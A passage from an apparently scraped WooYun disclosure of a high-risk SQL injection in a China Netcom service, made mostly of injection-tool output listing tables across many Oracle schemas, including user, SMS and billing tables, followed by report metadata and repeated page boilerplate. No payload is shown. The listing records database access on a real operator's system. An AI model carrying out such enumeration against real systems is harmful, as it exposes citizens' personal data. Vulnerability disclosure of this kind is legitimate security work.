| TF_TIME_SEND                   |
| TF_TOTAL_SCORE                 |
| TF_USCENT                      |
| TF_USERCENT                    |
| TF_USERSMS8                    |
| TF_USERSMS81                   |
| TF_USER_INFO                   |
| TF_USER_INFO1                  |
| TF_USER_INFO2                  |
| TF_USER_INFO3                  |
| TF_USER_INFO_TEMP              |
| TF_USER_PROPERTY               |
| TF_USER_TTJK                   |
| TF_WEB_SEND                    |
| TF_WEB_SENDBAK                 |
| TF_WEB_SEND_BAK                |
| TGM_BBS_MANAGE                 |
| TGM_RULE_MANAGE                |
| TGM_USER_ADVICE                |
| TIN_USER_INTEGRAL              |
| TIN_USER_INTEGRAL_BAK          |
| TIN_USER_INTEGRAL_DETAIL       |
| TIV_USER_INVITE                |
| TIV_USER_INVITE_MID            |
| TPM_AREA_INFO                  |
| TPM_COUNTY_INFO                |
| TPM_EMPLOYEE_INFO              |
| TPM_RECEIVE_PHONE_RANG         |
| TPM_STATIC_CODE                |
| TPM_SYS_CONTROL_PARAM          |
| TRI_MSG_BILL                   |
| TRI_MSG_BILL_COMMON            |
| TRI_MSG_BILL_COMMON_HIS        |
| TRI_MSG_BILL_HIS               |
| TRP_AREA_TRANS_DAY_REPORT      |
| TRP_MSG_BILL                   |
| TRP_MSG_BILL_CONTENT           |
| TRP_MSG_DOWN_DAY_REPORT        |
| TRP_MSG_TRANS_DAY_REPORT       |
| TRP_SYS_USER_TRANS_ACTION      |
| TRP_SYS_USER_TRANS_COM_DETAIL  |
| TRP_SYS_USER_TRANS_DETAIL      |
| TRP_USER_AREA_DUMP_DAY_REPORT  |
| TRP_USER_AREA_DUMP_MONTH_REP   |
| TRP_USER_AREA_DUMP_WEEK_REP    |
| TRP_USER_AREA_FEE_DAY_REPORT   |
| TRP_USER_AREA_STATUS_DAY_REPOT |
| TRP_USER_DOWN                  |
| TRP_USER_DOWN_DAY_REPORT       |
| TRP_USER_DUMP_DAY_REPORT       |
| TRP_USER_DUMP_MONTH_REP        |
| TRP_USER_DUMP_WEEK_REP         |
| TRP_USER_FEE_DAY_REPORT        |
| TRP_USER_INFO                  |
| TRP_USER_INFO_AREA_DAY_REPORT  |
| TRP_USER_INFO_DAY_REPORT       |
| TRP_USER_INFO_HIS              |
| TRP_USER_STATUS_DAY_REPORT     |
| TRP_USER_TRANS_DAY_REPORT      |
| TRP_USER_TRANS_DETAIL          |
| TRP_USER_TRANS_DETAIL_HIS      |
| TRP_USER_UP                    |
| TRP_USER_UP_DAY_REPORT         |
| TRP_WASTE_MONTH_REPORT_DETAIL  |
| TSB_MOBILE_TEMP                |
| TSM_MSG_CONTENT_CUSTOM         |
| TSM_MSG_DECLARE_CONTENT        |
| TSM_MSG_DECLARE_CUSTOM         |
| TSM_USER_SMS_RELATE            |
| TUI_USER_ACCEPT_SMS            |
| TUI_USER_ACCEPT_SMS_HIS        |
| TUI_USER_CUSTOM_SMCALSS        |
| TUI_USER_FREE_SMCALSS          |
| TUI_USER_FRIEND_LIST           |
| TUI_USER_INFO_INVITE           |
| TUI_USER_PERSON_INFO           |
| TUI_USER_TRANS_ACTION          |
| TUP_WASTE_SMS_CHECK            |
| TWP_WASTE_USER_PRIZE           |
| T_SYS_TASK_CONTROL             |
| T_SYS_TASK_DEPEND              |
| T_SYS_TASK_EXEC_LOG            |
| T_SYS_TASK_LIST                |
| T_SYS_TASK_LIST_TIME           |
| T_SYS_TASK_WARN_LOG            |
| T_SYS_WARN_USER                |
| WFQ_PRIZE_LOG                  |
+--------------------------------+
Database: RMAN
[30 tables]
+--------------------------------+
| AL                             |
| BCB                            |
| BCF                            |
| BDF                            |
| BP                             |
| BRL                            |
| BS                             |
| BSF                            |
| CCB                            |
| CCF                            |
| CDF                            |
| CKP                            |
| CONF                           |
| CONFIG                         |
| DB                             |
| DBINC                          |
| DF                             |
| DFATT                          |
| OFFR                           |
| ORL                            |
| RCVER                          |
| RLH                            |
| RR                             |
| RT                             |
| SCR                            |
| SCRL                           |
| TS                             |
| TSATT                          |
| XCF                            |
| XDF                            |
+--------------------------------+
Database: QS
[15 tables]
+--------------------------------+
| AQ$_AQ$_MEM_MC_H               |
| AQ$_AQ$_MEM_MC_I               |
| AQ$_AQ$_MEM_MC_NR              |
| AQ$_AQ$_MEM_MC_S               |
| AQ$_AQ$_MEM_MC_T               |
| AQ$_MEM_MC                     |
| AQ$_QS_ORDERS_PR_MQTAB_H       |
| AQ$_QS_ORDERS_PR_MQTAB_I       |
| AQ$_QS_ORDERS_PR_MQTAB_NR      |
| AQ$_QS_ORDERS_PR_MQTAB_S       |
| AQ$_QS_ORDERS_PR_MQTAB_T       |
| QS_ORDERS_PR_MQTAB             |
| QS_ORDERS_SQTAB                |
| SYS_IOT_OVER_29881             |
| SYS_IOT_OVER_29906             |
+--------------------------------+
Database: QS_WS
[14 tables]
+--------------------------------+
| AQ$_QS_WS_ORDERS_MQTAB_H       |
| AQ$_QS_WS_ORDERS_MQTAB_I       |
| AQ$_QS_WS_ORDERS_MQTAB_NR      |
| AQ$_QS_WS_ORDERS_MQTAB_S       |
| AQ$_QS_WS_ORDERS_MQTAB_T       |
| AQ$_QS_WS_ORDERS_PR_MQTAB_H    |
| AQ$_QS_WS_ORDERS_PR_MQTAB_I    |
| AQ$_QS_WS_ORDERS_PR_MQTAB_NR   |
| AQ$_QS_WS_ORDERS_PR_MQTAB_S    |
| AQ$_QS_WS_ORDERS_PR_MQTAB_T    |
| QS_WS_ORDERS_MQTAB             |
| QS_WS_ORDERS_PR_MQTAB          |
| SYS_IOT_OVER_29970             |
| SYS_IOT_OVER_29988             |
+--------------------------------+
Database: OE
[9 tables]
+--------------------------------+
| CUSTOMERS                      |
| INVENTORIES                    |
| ORDERS                         |
| ORDER_ITEMS                    |
| PRODUCT_DESCRIPTIONS           |
| PRODUCT_INFORMATION            |
| PRODUCT_REF_LIST_NESTEDTAB     |
| SUBCATEGORY_REF_LIST_NESTEDTAB |
| WAREHOUSES                     |
+--------------------------------+
Database: SYSTEM
[130 tables]
+--------------------------------+
| AQ$_INTERNET_AGENTS            |
| AQ$_INTERNET_AGENT_PRIVS       |
| AQ$_QUEUES                     |
| AQ$_QUEUE_TABLES               |
| AQ$_SCHEDULES                  |
| DEF$_AQCALL                    |
| DEF$_AQERROR                   |
| DEF$_CALLDEST                  |
| DEF$_DEFAULTDEST               |
| DEF$_DESTINATION               |
| DEF$_ERROR                     |
| DEF$_LOB                       |
| DEF$_ORIGIN                    |
| DEF$_PROPAGATOR                |
| DEF$_PUSHED_TRANSACTIONS       |
| DEF$_TEMP$LOB                  |
| HELP                           |
| LOGMNRC_DBNAME_UID_MAP         |
| LOGMNRC_GSII                   |
| LOGMNRC_GTCS                   |
| LOGMNRC_GTLO                   |
| LOGMNR_AGE_SPILL$              |
| LOGMNR_ATTRCOL$                |
| LOGMNR_ATTRIBUTE$              |
| LOGMNR_CCOL$                   |
| LOGMNR_CDEF$                   |
| LOGMNR_COL$                    |
| LOGMNR_COLTYPE$                |
| LOGMNR_DICTIONARY$             |
| LOGMNR_DICTSTATE$              |
| LOGMNR_HEADER1$                |
| LOGMNR_HEADER2$                |
| LOGMNR_ICOL$                   |
| LOGMNR_IND$                    |
| LOGMNR_INDCOMPART$             |
| LOGMNR_INDPART$                |
| LOGMNR_INDSUBPART$             |
| LOGMNR_LOB$                    |
| LOGMNR_LOBFRAG$                |
| LOGMNR_LOG$                    |
| LOGMNR_OBJ$                    |
| LOGMNR_PROCESSED_LOG$          |
| LOGMNR_RESTART_CKPT$           |
| LOGMNR_RESTART_CKPT_TXINFO$    |
| LOGMNR_SESSION$                |
| LOGMNR_SPILL$                  |
| LOGMNR_TAB$                    |
| LOGMNR_TABCOMPART$             |
| LOGMNR_TABPART$                |
| LOGMNR_TABSUBPART$             |
| LOGMNR_TS$                     |
| LOGMNR_TYPE$                   |
| LOGMNR_UID$                    |
| LOGMNR_USER$                   |
| LOGSTDBY$APPLY_MILESTONE       |
| LOGSTDBY$APPLY_PROGRESS        |
| LOGSTDBY$EVENTS                |
| LOGSTDBY$PARAMETERS            |
| LOGSTDBY$PLSQL                 |
| LOGSTDBY$SCN                   |
| LOGSTDBY$SKIP                  |
| LOGSTDBY$SKIP_SUPPORT          |
| LOGSTDBY$SKIP_TRANSACTION      |
| MVIEW$_ADV_AJG                 |
| MVIEW$_ADV_BASETABLE           |
| MVIEW$_ADV_CLIQUE              |
| MVIEW$_ADV_ELIGIBLE            |
| MVIEW$_ADV_EXCEPTIONS          |
| MVIEW$_ADV_FILTER              |
| MVIEW$_ADV_FILTERINSTANCE      |
| MVIEW$_ADV_FJG                 |
| MVIEW$_ADV_GC                  |
| MVIEW$_ADV_INDEX               |
| MVIEW$_ADV_INFO                |
| MVIEW$_ADV_JOURNAL             |
| MVIEW$_ADV_LEVEL               |
| MVIEW$_ADV_LOG                 |
| MVIEW$_ADV_OUTPUT              |
| MVIEW$_ADV_PARAMETERS          |
| MVIEW$_ADV_PARTITION           |
| MVIEW$_ADV_PLAN                |
| MVIEW$_ADV_PRETTY              |
| MVIEW$_ADV_ROLLUP              |
| MVIEW$_ADV_SQLDEPEND           |
| MVIEW$_ADV_TEMP                |
| MVIEW$_ADV_WORKLOAD            |
| REPCAT$_AUDIT_ATTRIBUTE        |
| REPCAT$_AUDIT_COLUMN           |
| REPCAT$_COLUMN_GROUP           |
| REPCAT$_CONFLICT               |
| REPCAT$_DDL                    |
| REPCAT$_EXCEPTIONS             |
| REPCAT$_EXTENSION              |
| REPCAT$_FLAVORS                |
| REPCAT$_FLAVOR_OBJECTS         |
| REPCAT$_GENERATED              |
| REPCAT$_GROUPED_COLUMN         |
| REPCAT$_INSTANTIATION_DDL      |
| REPCAT$_KEY_COLUMNS            |
| REPCAT$_OBJECT_PARMS           |
| REPCAT$_OBJECT_TYPES           |
| REPCAT$_PARAMETER_COLUMN       |
| REPCAT$_PRIORITY               |
| REPCAT$_PRIORITY_GROUP         |
| REPCAT$_REFRESH_TEMPLATES      |
| REPCAT$_REPCAT                 |
| REPCAT$_REPCATLOG              |
| REPCAT$_REPCOLUMN              |
| REPCAT$_REPGROUP_PRIVS         |
| REPCAT$_REPOBJECT              |
| REPCAT$_REPPROP                |
| REPCAT$_REPSCHEMA              |
| REPCAT$_RESOLUTION             |
| REPCAT$_RESOLUTION_METHOD      |
| REPCAT$_RESOLUTION_STATISTICS  |
| REPCAT$_RESOL_STATS_CONTROL    |
| REPCAT$_RUNTIME_PARMS          |
| REPCAT$_SITES_NEW              |
| REPCAT$_SITE_OBJECTS           |
| REPCAT$_SNAPGROUP              |
| REPCAT$_TEMPLATE_OBJECTS       |
| REPCAT$_TEMPLATE_PARMS         |
| REPCAT$_TEMPLATE_REFGROUPS     |
| REPCAT$_TEMPLATE_SITES         |
| REPCAT$_TEMPLATE_STATUS        |
| REPCAT$_TEMPLATE_TARGETS       |
| REPCAT$_TEMPLATE_TYPES         |
| REPCAT$_USER_AUTHORIZATIONS    |
| REPCAT$_USER_PARM_VALUES       |
| SQLPLUS_PRODUCT_PROFILE        |
+--------------------------------+
Database: SYS
[341 tables]
+--------------------------------+
| DUAL                           |
| ACCESS$                        |
| APPLY$_CONF_HDLR_COLUMNS       |
| APPLY$_DEST_OBJ                |
| APPLY$_DEST_OBJ_CMAP           |
| APPLY$_DEST_OBJ_OPS            |
| APPLY$_ERROR                   |
| APPLY$_ERROR_HANDLER           |
| APPLY$_SOURCE_OBJ              |
| APPLY$_SOURCE_SCHEMA           |
| APPROLE$                       |
| AQ$_MESSAGE_TYPES              |
| AQ$_PENDING_MESSAGES           |
| AQ$_PROPAGATION_STATUS         |
| AQ$_PUBLISHER                  |
| AQ$_QUEUE_STATISTICS           |
| AQ$_QUEUE_TABLE_AFFINITIES     |
| AQ$_REPLAY_INFO                |
| AQ$_SCHEDULES                  |
| AQ_EVENT_TABLE                 |
| AQ_SRVNTFN_TABLE               |
| ARGUMENT$                      |
| ASSOCIATION$                   |
| ATEMPTAB$                      |
| ATTRCOL$                       |
| ATTRIBUTE$                     |
| ATTRIBUTE_TRANSFORMATIONS$     |
| AUD$                           |
| AUDIT$                         |
| AUDIT_ACTIONS                  |
| AURORA$SHUTDOWN$CLASSES$       |
| AURORA$STARTUP$CLASSES$        |
| AUX_STATS$                     |
| AW$                            |
| AW$CWMTOECM                    |
| AW$EXPRESS                     |
| BOOTSTRAP$                     |
| CCOL$                          |
| CDC_CHANGE_COLUMNS$            |
| CDC_CHANGE_SETS$               |
| CDC_CHANGE_SOURCES$            |
| CDC_CHANGE_TABLES$             |
| CDC_SUBSCRIBED_COLUMNS$        |
| CDC_SUBSCRIBED_TABLES$         |
| CDC_SUBSCRIBERS$               |
| CDC_SYSTEM$                    |
| CDEF$                          |
| CLU$                           |
| COL$                           |
| COLLECTION$                    |
| COLTYPE$                       |
| COL_USAGE$                     |
| COM$                           |
| CON$                           |
| CONTEXT$                       |
| DBMS_ALERT_INFO                |
| DBMS_LOCK_ALLOCATED            |
| DEFROLE$                       |
| DEFSUBPART$                    |
| DEFSUBPARTLOB$                 |
| DEPENDENCY$                    |
| DIM$                           |
| DIMATTR$                       |
| DIMJOINKEY$                    |
| DIMLEVEL$                      |
| DIMLEVELKEY$                   |
| DIR$                           |
| DUC$                           |
| ERROR$                         |
| EXPACT$                        |
| EXPDEPACT$                     |
| EXPDEPOBJ$                     |
| EXPPKGACT$                     |
| EXPPKGOBJ$                     |
| EXTERNAL_LOCATION$             |
| EXTERNAL_TAB$                  |
| FET$                           |
| FGA$                           |
| FGA_LOG$                       |
| FILE$                          |
| HIER$                          |
| HIERLEVEL$                     |
| HISTGRM$                       |
| HIST_HEAD$                     |
| HS$_BASE_CAPS                  |
| HS$_BASE_DD                    |
| HS$_CLASS_CAPS                 |
| HS$_CLASS_DD                   |
| HS$_CLASS_INIT                 |
| HS$_FDS_CLASS                  |
| HS$_FDS_CLASS_DATE             |
| HS$_FDS_INST                   |
| HS$_INST_CAPS                  |
| HS$_INST_DD                    |
| HS$_INST_INIT                  |
| ICOL$                          |
| ICOLDEP$                       |
| IDL_CHAR$                      |
| IDL_SB4$                       |
| IDL_UB1$                       |
| IDL_UB2$                       |
| ID_GENS$                       |
| INCEXP                         |
| INCFIL                         |
| INCVID                         |
| IND$                           |
| INDCOMPART$                    |
| INDOP$                         |
| INDPART$                       |
| INDPART_PARAM$                 |
| INDSUBPART$                    |
| INDTYPES$                      |
| JACCELERATOR$DLLS              |
| JACCELERATOR$DLL_ERRORS        |
| JACCELERATOR$STATUS            |
| JAVA$JVM$STATUS                |
| JAVA$JVM$STEPS$DONE            |
| JAVA$POLICY$                   |
| JAVA$POLICY$SHARED$TABLE       |
| JAVA$RMJVM$AUX                 |
| JAVA$RMJVM$AUX2                |
| JAVA$RMJVM$AUX3                |
| JAVASNM$                       |
| JIJOIN$                        |
| JIREFRESHSQL$                  |
| JOB$                           |
| KOPM$                          |
| LIBRARY$                       |
| LINK$                          |
| LOB$                           |
| LOBCOMPPART$                   |
| LOBFRAG$                       |
| LOC$                           |
| LOG$                           |
| LOGMNRG_ATTRCOL$               |
| LOGMNRG_ATTRIBUTE$             |
| LOGMNRG_CCOL$                  |
| LOGMNRG_CDEF$                  |
| LOGMNRG_COL$                   |
| LOGMNRG_COLTYPE$               |
| LOGMNRG_DICTIONARY$            |
| LOGMNRG_ICOL$                  |
| LOGMNRG_IND$                   |
| LOGMNRG_INDCOMPART$            |
| LOGMNRG_INDPART$               |
| LOGMNRG_INDSUBPART$            |
| LOGMNRG_LOB$                   |
| LOGMNRG_LOBFRAG$               |
| LOGMNRG_OBJ$                   |
| LOGMNRG_SEED$                  |
| LOGMNRG_TAB$                   |
| LOGMNRG_TABCOMPART$            |
| LOGMNRG_TABPART$               |
| LOGMNRG_TABSUBPART$            |
| LOGMNRG_TS$                    |
| LOGMNRG_TYPE$                  |
| LOGMNRG_USER$                  |
| LOGMNRT_ATTRCOL$               |
| LOGMNRT_ATTRIBUTE$             |
| LOGMNRT_CCOL$                  |
| LOGMNRT_CDEF$                  |
| LOGMNRT_COL$                   |
| LOGMNRT_COLTYPE$               |
| LOGMNRT_DICTIONARY$            |
| LOGMNRT_ICOL$                  |
| LOGMNRT_IND$                   |
| LOGMNRT_INDCOMPART$            |
| LOGMNRT_INDPART$               |
| LOGMNRT_INDSUBPART$            |
| LOGMNRT_LOB$                   |
| LOGMNRT_LOBFRAG$               |
| LOGMNRT_OBJ$                   |
| LOGMNRT_SEED$                  |
| LOGMNRT_TAB$                   |
| LOGMNRT_TABCOMPART$            |
| LOGMNRT_TABPART$               |
| LOGMNRT_TABSUBPART$            |
| LOGMNRT_TS$                    |
| LOGMNRT_TYPE$                  |
| LOGMNRT_USER$                  |
| LOGMNR_BUILDLOG                |
| LOGMNR_INTERESTING_COLS        |
| MAP_COMPLIST$                  |
| MAP_ELEMENT$                   |
| MAP_EXTELEMENT$                |
| MAP_FILE$                      |
| MAP_FILE_EXTENT$               |
| MAP_OBJECT                     |
| MAP_SUBELEMENT$                |
| METAFILTER$                    |
| METASTYLESHEET                 |
| METAVIEW$                      |
| METAXSL$                       |
| METAXSLPARAM$                  |
| METHOD$                        |
| MIGRATE$                       |
| MLOG$                          |
| MLOG_REFCOL$                   |
| MON_MODS$                      |
| NOEXP$                         |
| NTAB$                          |
| OBJ$                           |
| OBJAUTH$                       |
| OBJECT_USAGE                   |
| OBJPRIV$                       |
| ODCI_SECOBJ$                   |
| ODCI_WARNINGS$                 |
| OID$                           |
| OLAP$ALTER_SESSION             |
| OLAPTABLEVELS                  |
| OLAPTABLEVELTUPLES             |
| OPANCILLARY$                   |
| OPARG$                         |
| OPBINDING$                     |
| OPERATOR$                      |
| OPQTYPE$                       |
| PARAMETER$                     |
| PARTCOL$                       |
| PARTLOB$                       |
| PARTOBJ$                       |
| PENDING_SESSIONS$              |
| PENDING_SUB_SESSIONS$          |
| PENDING_TRANS$                 |
| PROCEDURE$                     |
| PROCEDUREC$                    |
| PROCEDUREINFO$                 |
| PROCEDUREJAVA$                 |
| PROFILE$                       |
| PROFNAME$                      |
| PROPS$                         |
| PROXY_DATA$                    |
| PROXY_ROLE_DATA$               |
| PRVT_EPGCTAB_ADMIN             |
| PRVT_EPGCTAB_DAD               |
| PRVT_EPGCTAB_DAD_ATTRS         |
| PRVT_EPGCTAB_GLOBALS           |
| PRVT_EPGCTAB_PORTS             |
| PS$                            |
| PSTUBTBL                       |
| REC_TAB$                       |
| REC_VAR$                       |
| REFCON$                        |
| REG$                           |
| REGISTRY$                      |
| REG_SNAP$                      |
| RESOURCE_CONSUMER_GROUP$       |
| RESOURCE_COST$                 |
| RESOURCE_MAP                   |
| RESOURCE_PLAN$                 |
| RESOURCE_PLAN_DIRECTIVE$       |
| RESULT$                        |
| RGCHILD$                       |
| RGROUP$                        |
| RLS$                           |
| RLS_CTX$                       |
| RLS_GRP$                       |
| RULE$                          |
| RULESET$                       |
| RULE_EC$                       |
| RULE_MAP$                      |
| RULE_SET$                      |
| SECOBJ$                        |
| SEG$                           |
| SEQ$                           |
| SETTINGS$                      |
| SLOG$                          |
| SMON_SCN_TIME                  |
| SNAP$                          |
| SNAP_COLMAP$                   |
| SNAP_LOADERTIME$               |
| SNAP_LOGDEP$                   |
| SNAP_OBJCOL$                   |
| SNAP_REFOP$                    |
| SNAP_REFTIME$                  |
| SNAP_SITE$                     |
| SOURCE$                        |
| SQL_VERSION$                   |
| STMT_AUDIT_OPTION_MAP          |
| STREAMS$_APPLY_MILESTONE       |
| STREAMS$_APPLY_PROCESS         |
| STREAMS$_APPLY_PROGRESS        |
| STREAMS$_CAPTURE_PROCESS       |
| STREAMS$_DEF_PROC              |
| STREAMS$_KEY_COLUMNS           |
| STREAMS$_PREPARE_DDL           |
| STREAMS$_PREPARE_OBJECT        |
| STREAMS$_PROCESS_PARAMS        |
| STREAMS$_PROPAGATION_PROCESS   |
| STREAMS$_RULES                 |
| SUBCOLTYPE$                    |
| SUBPARTCOL$                    |
| SUM$                           |
| SUMAGG$                        |
| SUMDELTA$                      |
| SUMDEP$                        |
| SUMDETAIL$                     |
| SUMINLINE$                     |
| SUMJOIN$                       |
| SUMKEY$                        |
| SUMPARTLOG$                    |
| SUMPRED$                       |
| SUPEROBJ$                      |
| SYN$                           |
| SYSAUTH$                       |
| SYSTEM_PRIVILEGE_MAP           |
| TAB$                           |
| TABCOMPART$                    |
| TABLE_PRIVILEGE_MAP            |
| TABPART$                       |
| TABSUBPART$                    |
| TRANSFORMATIONS$               |
| TRIGGER$                       |
| TRIGGERCOL$                    |
| TRIGGERJAVAC$                  |
| TRIGGERJAVAF$                  |
| TRIGGERJAVAM$                  |
| TRIGGERJAVAS$                  |
| TRUSTED_LIST$                  |
| TS$                            |
| TSQ$                           |
| TYPE$                          |
| TYPED_VIEW$                    |
| TYPEHIERARCHY$                 |
| TYPE_MISC$                     |
| UET$                           |
| UGROUP$                        |
| UNDO$                          |
| USER$                          |
| USER_ASTATUS_MAP               |
| USER_HISTORY$                  |
| USTATS$                        |
| UTL_RECOMP_BACKUP_JOBS         |
| UTL_RECOMP_COMPILED            |
| UTL_RECOMP_INVALID             |
| UTL_RECOMP_LOG                 |
| UTL_RECOMP_SORTED              |
| VIEW$                          |
| VIEWCON$                       |
| VIEWTRCOL$                     |
| VTABLE$                        |
| _DEFAULT_AUDITING_OPTIONS_     |
+--------------------------------+
Database: SH
[15 tables]
+--------------------------------+
| CAL_MONTH_SALES_MV             |
| CHANNELS                       |
| COSTS                          |
| COUNTRIES                      |
| CUSTOMERS                      |
| FWEEK_PSCAT_SALES_MV           |
| MVIEW$_EXCEPTIONS              |
| MV_CAPABILITIES_TABLE          |
| PLAN_TABLE                     |
| PRODUCTS                       |
| PROMOTIONS                     |
| REWRITE_TABLE                  |
| SALES                          |
| SALES_TRANSACTIONS_EXT         |
| TIMES                          |
+--------------------------------+
Database: SCOTT
[4 tables]
+--------------------------------+
| BONUS                          |
| DEPT                           |
| EMP                            |
| SALGRADE                       |
+--------------------------------+
Database: WMSYS
[22 tables]
+--------------------------------+
| WM$ADT_FUNC_TABLE              |
| WM$ENV_VARS                    |
| WM$INSTEADOF_TRIGS_TABLE       |
| WM$LOCKROWS_INFO               |
| WM$MODIFIED_TABLES             |
| WM$MW_TABLE                    |
| WM$NESTED_COLUMNS_TABLE        |
| WM$NEXTVER_TABLE               |
| WM$REPLICATION_TABLE           |
| WM$RESOLVE_WORKSPACES_TABLE    |
| WM$RIC_TABLE                   |
| WM$RIC_TRIGGERS_TABLE          |
| WM$TMP_DBA_CONSTRAINTS         |
| WM$UDTRIG_DISPATCH_PROCS       |
| WM$UDTRIG_INFO                 |
| WM$VERSIONED_TABLES            |
| WM$VERSION_HIERARCHY_TABLE     |
| WM$VERSION_TABLE               |
| WM$VT_ERRORS_TABLE             |
| WM$WORKSPACES_TABLE            |
| WM$WORKSPACE_PRIV_TABLE        |
| WM$WORKSPACE_SAVEPOINTS_TABLE  |
+--------------------------------+
Database: ODM_MTR
[12 tables]
+--------------------------------+
| CENSUS_2D_APPLY_BINNED         |
| CENSUS_2D_APPLY_UNBINNED       |
| CENSUS_2D_BUILD_BINNED         |
| CENSUS_2D_BUILD_UNBINNED       |
| CENSUS_2D_TEST_BINNED          |
| CENSUS_2D_TEST_UNBINNED        |
| EIGHT_CLOUDS_APPLY_UNBINNED    |
| EIGHT_CLOUDS_BUILD_UNBINNED    |
| MAGAZINE_2D_BUILD_BINNED       |
| MAGAZINE_2D_TEST_BINNED        |
| MARKET_BASKET_2D_BINNED        |
| MARKET_BASKET_TX_BINNED        |
+--------------------------------+

漏洞证明：

已证明

修复方案：

过滤

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：16

确认时间：2015-02-19 08:51

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-097403

漏洞标题：中国网通某业务高危SQL注入（可跨库）可泄露市民信息（包括电话号码等）

相关厂商：中国网通

漏洞作者：路人甲

提交时间：2015-02-15 17:04

修复时间：2015-04-01 17:06

公开时间：2015-04-01 17:06

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-097403

漏洞标题：中国网通某业务高危SQL注入（可跨库）可泄露市民信息（包括电话号码等）

相关厂商：中国网通

漏洞作者： 路人甲

提交时间：2015-02-15 17:04

修复时间：2015-04-01 17:06

公开时间：2015-04-01 17:06

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-097403"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云